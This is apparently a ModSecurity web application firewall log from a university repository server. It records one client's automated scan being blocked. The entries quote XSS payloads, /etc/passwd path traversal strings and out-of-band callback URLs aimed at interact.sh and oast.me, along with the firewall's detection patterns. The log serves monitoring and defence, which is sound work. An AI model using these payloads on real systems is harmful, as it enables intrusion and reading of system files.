[Tue Aug 29 11:53:52.896390 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/product.php"] [unique_id "ZO154MCo-f0AAApLWkkAAAAI"]
[Tue Aug 29 11:53:53.061755 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAApHRW0AAAAP"]
[Tue Aug 29 11:53:53.637614 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAAolKbUAAAAe"]
[Tue Aug 29 11:53:54.552887 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAApLWk4AAAAI"]
[Tue Aug 29 11:53:55.556272 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO1548Co-f0AAAoPufYAAAAM"]
[Tue Aug 29 11:53:55.809415 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAofm-YAAAAX"]
[Tue Aug 29 11:53:56.616137 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAolKbsAAAAe"]
[Tue Aug 29 11:53:57.576838 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/Login"] [unique_id "ZO155cCo-f0AAAoZ6VMAAAAK"]
[Tue Aug 29 11:54:00.599777 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAn40-kAAAAW"]
[Tue Aug 29 11:54:00.601374 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAox7MwAAAAN"]
[Tue Aug 29 11:54:00.601407 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAAofnAYAAAAX"]
[Tue Aug 29 11:54:00.744568 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAApLWl8AAAAI"]
[Tue Aug 29 11:54:01.638675 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApLWmAAAAAI"]
[Tue Aug 29 11:54:02.671810 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAox7NQAAAAN"]
[Tue Aug 29 11:54:04.851740 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAo2m@QAAAAA"]
[Tue Aug 29 11:54:04.908662 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAolKdsAAAAe"]
[Tue Aug 29 11:54:07.858654 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO1578Co-f0AAApJDX8AAAAY"]
[Tue Aug 29 11:54:08.668453 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApZHSkAAAAf"]
[Tue Aug 29 11:54:09.977480 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApLWpEAAAAI"]
[Tue Aug 29 11:54:10.939078 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAAoZ6ZUAAAAK"]
[Tue Aug 29 11:54:11.660206 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAAoZ6ZoAAAAK"]
[Tue Aug 29 11:54:12.611173 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0n3bn54icc384n.oast.site found within TX:1: cjmnijtjmimvgniikdb0n3bn54icc384n.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAAox7Q0AAAAN"]
[Tue Aug 29 11:54:14.145013 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApl988AAAAo"]
[Tue Aug 29 11:54:14.608197 2023] [:error] [pid 2658] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApilyUAAAAl"]
[Tue Aug 29 11:54:14.641447 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAAox7RoAAAAN"]
[Tue Aug 29 11:54:14.709392 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAox7R0AAAAN"]
[Tue Aug 29 11:54:15.549102 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApXgbIAAAAU"]
[Tue Aug 29 11:54:16.615654 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAAnHQwgAAAAT"]
[Tue Aug 29 11:54:16.639253 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAApgAyoAAAAH"]
[Tue Aug 29 11:54:20.907779 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAoAk7kAAAAC"]
[Tue Aug 29 11:54:21.014795 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-cCo-f0AAAoGFlUAAAAE"]
